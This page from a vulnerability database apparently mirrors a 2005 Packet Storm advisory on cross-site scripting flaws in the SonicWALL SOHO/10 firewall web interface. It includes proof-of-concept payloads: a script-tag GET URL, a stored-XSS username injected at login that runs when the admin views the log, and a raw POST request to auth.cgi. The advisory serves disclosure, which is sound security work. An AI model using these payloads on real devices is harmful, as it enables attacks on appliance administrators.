Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

sonicwallXSS.txt

🗓️ 17 Apr 2005 00:00:00Reported by Oliver KarowType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 31 Views

SonicWALL SOHO/10 XSS and Code Injection vulnerability in webroot, allowing script execution in user's environment and system logfile, affecting version Firmware: 5.1.7.0

Show more
Code
`SonicWALL SOHO/10 - XSS and Code Injection vulnerability  
========================================================  
  
Product:  
========  
  
SonicWall SOHO/10 is the 2nd generation Internet Security Appliance from  
Sonicwall, with firewall-, vpn-, contentfiltering- and other capabilities.   
  
  
Vulnerability:  
==============  
  
There is a Cross Site Scripting Vulnerability in the webroot.   
A HTTP-GET-request, containing script code will be executed  
in the webbrowsers environment of the user:  
  
  
http://192.168.168.168/<script>alert("Its not magic... its a  
sonic")</script>  
  
  
There is a second vulnerability, which i consider as something between a XSS  
and a code-injection vuln,  
because the user does not have to follow an html-link to run into the  
attack:  
  
If an attacker supplies a username, containing scriptcode, at the login-page  
of the device, an entry in the   
system logfile is done, containing the "username".  
  
The system logfile is displayed in html-format. If the appliance admin is  
viewing the logfile, the scriptcode  
will be executed.  
  
Because length of input field is limited by the browser (client site), you  
can insert a short script  
into the username field to do a quick verification of the existence of the  
vuln:  
  
</TD><script>alert("!")</script>  
  
To supply longer scripts, you have to modify the request f.e. with a proxy,  
or simply sent a modified   
post request via netcat:  
  
  
POST http://192.168.168.168:80/auth.cgi HTTP/1.0  
Accept: */*  
Referer: http://192.168.168.168/auth.html  
Accept-Language: de  
Content-Type: application/x-www-form-urlencoded  
Proxy-Connection: Keep-Alive  
User-Agent: BadGuy  
Host: 192.168.168.168  
Content-Length: 160  
Pragma: no-cache  
  
uName=</TD><script>alert("Its not magic... its a  
sonic")</script>&pass=NiceTry&Submit=Login&clientHash=bbe63bb858b02e741d2d12023ee350a1  
  
  
  
Version:  
========  
  
I only tested the following version:  
  
SonicWall SOHO/10  
Firmware: 5.1.7.0  
ROM-Version: 4.0.0  
  
Other versions may also be affected.  
  
Vendor:  
=======  
  
Website: http://www.sonicwall.com  
Status: informed  
  
Discovered by:  
==============  
  
Oliver Karow  
Date: 29.03.2005  
Website: http://www.oliverkarow.de/research/sonicwall.txt  
  
--   
Handyrechnung zu hoch? Tipp: SMS und MMS mit GMX  
Seien Sie so frei: Alle Infos unter http://www.gmx.net/de/go/freesms  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Apr 2005 00:00Current
7.4High risk
Vulners AI Score7.4
sonicwall soho/10cross site scriptingcode injectionvulnerabilityfirewallvpncontent filteringhttp get requestsystem logfileusername fieldhtml formatproxynetcatfirmware: 5.1.7.0
31
.json
Report